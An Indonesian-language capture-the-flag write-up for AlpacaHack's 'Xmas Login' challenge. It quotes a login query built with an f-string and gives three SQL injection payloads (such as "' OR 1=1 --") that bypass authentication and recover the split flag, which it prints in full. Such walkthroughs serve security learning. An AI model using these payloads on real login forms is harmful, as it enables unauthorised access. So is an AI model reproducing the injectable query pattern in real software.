Xmas Login

Xmas Login - AlpacaHack https://alpacahack.com/challenges/xmas-login

Kita di beri source dan kita bisa lihat di sini

query = (

f"SELECT * FROM users WHERE username='{username}' AND password='{password}';"

)

nah ini kan sqli banget kita bisa untuk bikin payload user: ' OR 1=1 -- pw: bebas

nah nanti kita bisa bypass dapat masuk nah tapi masalah nya

if user[0] == "alpaca":

return f"Hello, alpaca! Here is your flag: {FLAG_1}"

elif user[0] == "reindeer":

return f"Hello, reindeer! Here is your flag: {FLAG_2}"

elif user[0] == "santa_claus_admin":

return f"Hello, santa_claus_admin! Here is your flag: {FLAG_3}"

else:

return f"Hello, {user[0]}!"

jadi karena flag nya di pecah pecah kita harus buat 3 payload berbeda agar dapat username yang pass dan bypass password nya

yang pertama user: ' OR 1=1 -- pw: bebas

ini akan dapat flag ![[Pasted image 20260715134902.png]]

Hello, alpaca! Here is your flag: Alpaca{M3rry_Xmas!_Th1s_

Nah lalu kita bisa bikin yang kedua username: reindeer'-- pw: bebas ![[Pasted image 20260715135047.png]]

Hello, reindeer! Here is your flag: is_4_g1ft_fr0m_santa!_an

nah yang terakhir karena limit username nya gak cukup kita bisa

username: bebas pw: OR username = 'santa_claus_admin' --

nanti quary nya akan

SELECT * FROM users WHERE username='bebas' AND password='' OR username = 'santa_claus_admin' --';

dan flag nya :

Hello, santa_claus_admin! Here is your flag: d_Happy_N3w_Year_2026!!}

Final FLAG: Alpaca{M3rry_Xmas!_Th1s_ is_4_g1ft_fr0m_santa!_and_Happy_N3w_Year_2026!!}

Table of Contents